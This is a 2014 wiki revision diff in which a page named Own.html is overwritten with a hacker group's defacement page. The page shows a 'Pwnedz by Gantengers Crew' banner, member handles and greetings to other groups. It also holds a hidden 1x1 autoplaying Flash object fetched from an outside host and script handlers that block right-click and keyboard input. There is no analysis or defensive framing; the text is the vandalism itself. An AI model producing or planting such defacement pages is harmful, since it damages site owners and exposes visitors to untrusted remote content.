Own.html: Difference between revisions
No edit summary |
|||
Line 1: | Line 1: | ||
-''' | |||
---- | <!DOCTYPE html> | ||
<html lang="en"> | |||
= | <head> | ||
<link rel="icon" | |||
type="image/png" href="http://www.paper-machinery.com/flags/Indonesia.gif" /> | |||
<title>Gantengers Crew</title> | |||
<style type="text/css"> | |||
@import url(http://fonts.googleapis.com/css?family=Anonymous+Pro:700); | |||
body{background: black; text-align: center; color: white;font-family: 'Anonymous Pro', sans-serif;} | |||
p{font-family: 'Anonymous Pro', sans-serif;font-size: 120%;} | |||
@-webkit-keyframes fadeIn { from { opacity:0; } to { opacity:1; } } | |||
@-moz-keyframes fadeIn { from { opacity:0; } to { opacity:1; } } | |||
@keyframes fadeIn { from { opacity:0; } to { opacity:1; } } | |||
.fade-in { | |||
opacity:0; /* make things invisible upon start */ | |||
-webkit-animation:fadeIn ease-in 1; /* call our keyframe named fadeIn, use animattion ease-in and repeat it only 1 time */ | |||
-moz-animation:fadeIn ease-in 1; | |||
animation:fadeIn ease-in 1; | |||
-webkit-animation-fill-mode:forwards; /* this makes sure that after animation is done we remain at the last keyframe value (opacity: 1)*/ | |||
-moz-animation-fill-mode:forwards; | |||
animation-fill-mode:forwards; | |||
-webkit-animation-duration:1s; | |||
-moz-animation-duration:1s; | |||
animation-duration:1s; | |||
} | |||
.fade-in.one { | |||
-webkit-animation-delay: 0.3s; | |||
-moz-animation-delay: 0.3s; | |||
animation-delay: 0.3s; | |||
} | |||
.fade-in.two { | |||
-webkit-animation-delay: 1.5s; | |||
-moz-animation-delay:1.5s; | |||
animation-delay: 1.5s; | |||
} | |||
.fade-in.three { | |||
-webkit-animation-delay: 3s; | |||
-moz-animation-delay: 3s; | |||
animation-delay: 3s; | |||
} | |||
.fade-in.four { | |||
-webkit-animation-delay: 4.5s; | |||
-moz-animation-delay: 4.5s; | |||
animation-delay: 4.5s; | |||
} | |||
.fade-in.five { | |||
-webkit-animation-delay: 6s; | |||
-moz-animation-delay: 6s; | |||
animation-delay: 6s; | |||
} | |||
.fade-in.six { | |||
-webkit-animation-delay: 7.5s; | |||
-moz-animation-delay: 7.5s; | |||
animation-delay: 7.5s; | |||
} | |||
.fade-in.seven { | |||
-webkit-animation-delay: 9s; | |||
-moz-animation-delay: 9s; | |||
animation-delay: 9s; | |||
} | |||
.fade-in.eight { | |||
-webkit-animation-delay: 10.5s; | |||
-moz-animation-delay: 10.5s; | |||
animation-delay: 10.5s; | |||
} | |||
.fade-in.nine { | |||
-webkit-animation-delay: 13s; | |||
-moz-animation-delay: 13s; | |||
animation-delay: 13s; | |||
} | |||
.fade-in.ten { | |||
-webkit-animation-delay: 15s; | |||
-moz-animation-delay: 15s; | |||
animation-delay: 15s; | |||
} | |||
.box{ | |||
position:relative; | |||
margin: 0 auto; | |||
padding: 5px 0; | |||
} | |||
</style> | |||
<img src="https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-ash3/1441251_614086151984560_1298615303_n.jpg" width="460" | |||
height="250"></p> | |||
<p align="center"><b><font face="Impact" size="7" color="red"> Surprise By</font><font face="Impact" size="7" color="mintcream"> Gantengers Crew<br></font> | |||
</p><center><font face="Impact" size="5"> Pwnedz by Gantengers Crew <br><br> | |||
</center> | |||
<center>We Are Gantengers Crew :<br> | |||
SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php | |||
<br><br> | |||
<center>Greets to :</center> | |||
Dbuzz - Black Angels - Netter - hmei7 - h4x0r hussy - All Moeslim - All Madleets Friends</br> | |||
<embed src="http://syriab-bd.hak.su/llp2.swf?rel=0&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed></FONT></A></BIG></CENTER></PRE></PRE></FONT></BODY></HTML> | |||
<br> | |||
<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" | |||
</html> |
Revision as of 09:35, 15 January 2014
<!DOCTYPE html>
<html lang="en">
<head>
<link rel="icon" type="image/png" href="http://www.paper-machinery.com/flags/Indonesia.gif" />
<title>Gantengers Crew</title> <style type="text/css"> @import url(http://fonts.googleapis.com/css?family=Anonymous+Pro:700); body{background: black; text-align: center; color: white;font-family: 'Anonymous Pro', sans-serif;} p{font-family: 'Anonymous Pro', sans-serif;font-size: 120%;}
@-webkit-keyframes fadeIn { from { opacity:0; } to { opacity:1; } }
@-moz-keyframes fadeIn { from { opacity:0; } to { opacity:1; } } @keyframes fadeIn { from { opacity:0; } to { opacity:1; } }
.fade-in {
opacity:0; /* make things invisible upon start */ -webkit-animation:fadeIn ease-in 1; /* call our keyframe named fadeIn, use animattion ease-in and repeat it only 1 time */ -moz-animation:fadeIn ease-in 1; animation:fadeIn ease-in 1; -webkit-animation-fill-mode:forwards; /* this makes sure that after animation is done we remain at the last keyframe value (opacity: 1)*/ -moz-animation-fill-mode:forwards; animation-fill-mode:forwards; -webkit-animation-duration:1s; -moz-animation-duration:1s; animation-duration:1s;
}
.fade-in.one { -webkit-animation-delay: 0.3s; -moz-animation-delay: 0.3s; animation-delay: 0.3s; }
.fade-in.two { -webkit-animation-delay: 1.5s; -moz-animation-delay:1.5s; animation-delay: 1.5s; }
.fade-in.three { -webkit-animation-delay: 3s; -moz-animation-delay: 3s; animation-delay: 3s; } .fade-in.four { -webkit-animation-delay: 4.5s; -moz-animation-delay: 4.5s; animation-delay: 4.5s; } .fade-in.five { -webkit-animation-delay: 6s; -moz-animation-delay: 6s; animation-delay: 6s; } .fade-in.six { -webkit-animation-delay: 7.5s; -moz-animation-delay: 7.5s; animation-delay: 7.5s; } .fade-in.seven { -webkit-animation-delay: 9s; -moz-animation-delay: 9s; animation-delay: 9s; } .fade-in.eight { -webkit-animation-delay: 10.5s; -moz-animation-delay: 10.5s; animation-delay: 10.5s; } .fade-in.nine { -webkit-animation-delay: 13s; -moz-animation-delay: 13s; animation-delay: 13s; } .fade-in.ten { -webkit-animation-delay: 15s; -moz-animation-delay: 15s; animation-delay: 15s; }
.box{
position:relative;
margin: 0 auto;
padding: 5px 0;
}
</style>
<img src="https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-ash3/1441251_614086151984560_1298615303_n.jpg" width="460"
height="250">
Surprise By Gantengers Crew
SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
Dbuzz - Black Angels - Netter - hmei7 - h4x0r hussy - All Moeslim - All Madleets Friends
</BODY></HTML>
<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"
</html>